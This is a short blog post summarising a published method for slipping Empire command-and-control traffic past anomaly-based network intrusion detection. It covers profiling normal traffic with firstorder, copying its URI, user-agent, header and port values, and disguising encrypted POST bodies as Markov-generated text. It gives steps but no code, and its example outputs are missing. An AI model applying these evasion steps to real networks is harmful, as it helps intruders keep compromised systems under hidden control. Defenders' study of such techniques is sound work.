Use this tool to detect if your Network Anomaly detection solution is working smoothly

Don’t you just enjoy when someone has an awesome idea?! I certainly do, on the blog of Utku Sen you can find an article which describes how it is possible to evade anomaly-based network intrusion detection systems (NIDS).

We have summarized the important pieces of the blog right here for you.

What is the name of the tool that is used to evade anomaly detection?

It is not a tool. It is a combination of methods which will allow you to evade anomaly detection.

The name of the first tool is firstorder. This tool analyses the network traffic and tries to identify and capture a normal traffic profile.

The second tool is called MarkovObfuscate.

The third tool is called Empire.

The mentioned tools above will be discussed below.

Why is it important to have a normal traffic profile?

With a normal traffic profile, the listener will have a bigger chance evading listener-agent communication anomaly based NIDS. The NIDS simply does not see ‘weird’ traffic taking place.

The post-exploitation framework

In this project, the author used the Empire post-exploitation framework. This framework is based on PowerShell and Python.

Empire supports HTTP and HTTPS (also Dropbox etc.) listeners for C2-agent communication. Even tough HTTPS connection encrypts all communication, we will assume there is a solution on the network which intercepts and decrypts SSL/TLS traffic.

As you can read above, the author takes into consideration that in environments SSL/TLS splitters will be used, so in this project, the choice was made to use a HTTP based communication:

HTTP listener has following key options:

  • KillDate: Date for the listener to exit
  • DefaultDelay: Agent delay/reach back interval
  • WorkingHours: Hours for the agent to operate
  • DefaultProfile: User-agent value and URI specifi- cion for the agent
  • DefaultJitter: Jitter in agent reachback interval
  • Port: Listening port of the C2 server
  • StagingKey: Staging key for initial agent negotia- tion
  • ServerVersion: Server header for the C2 server.

HTTP listener provides -symmetric- encrypted communication even without SSL/TLS connection.

What does the NIDS look for?

In this project, the author mentioned that atleast the following values are used by NIDS to detect anomalies:

  1. Request URI
  2. User-agent value
  3. Server header
  4. Default HTML Content
  5. Port
  6. Connection Interval (DefaultDelay)

So how will the trojan communicate?

The author has divided the communication in two groups, the first group holds the following values:

  • Request URI
  • User-agent value
  • Server header
  • Por
  • Connection interval

The second group holds:

  • Default HTML Content
  • POST Request Body

It is also pointed out in the article, that often, in these type of attacks, the post method holds encrypted and gibberish data. This is quickly detected by anomaly detection systems, and that is why the author claims to use MarkovObfuscate which is a obfuscation project of the Cylance Spear Team.

The main attack method

Main attack steps will be:

  1. Get traffic capture data of a normal traffic and define normal behaviour of users.
  2. Change Empire’s listener traits according to first step.
  3. Start the C2-agent communication.

To normalize the first group of traits, we will extract most common URI, user-agent, server header and port values from the traffic capture data. With these data, we will set appropriate listener options.

The second group

For the second group of traits, default HTML content can be chosen by identifying most visited websites in traffic capture data. However, normalizing POST request body of the communication is not achievable by using traffic capture data. As it explained in previous sections, POST requests are encrypted and contains gibberish characters.

The solution for the POST requests

Instead of directly encrypting the data, we can use Markov Obfuscation tool which is created by Cylance Spear Team.

Once used correctly, it can change a simple /etc/passwd file from:

To:

The steps which need to be taken:

  1. First, we need to encode encrypted content with Base64 to get rid of gibberish characters.
  2. As we talked we also need lots of texts which will be used as training data. One way to do it is including the training data inside the agent. However, it won’t be practical since it will increase the agent size like ten megabytes. Instead of that, we can download the dataset from an external source. It doesn’t have to be our own website. We can program it for crawling and parsing texts from news websites, blogs etc.
  3. Train the Markov Obfuscation algorithm with downloaded training data.
  4. Encode the data with generated model.
  5. Send the encoded data to the C2 server, alongside with the training data.
  6. C2 server will also build the same model with the training data, and will be able to decode the main data.

Download the package:

References:

  1. github.com/tearsecurity/firstorder
  2. utkusen.com/blog/bypassing-anomaly-based-nids-with-empire.html
  3. github.com/CylanceSPEAR/MarkovObfuscate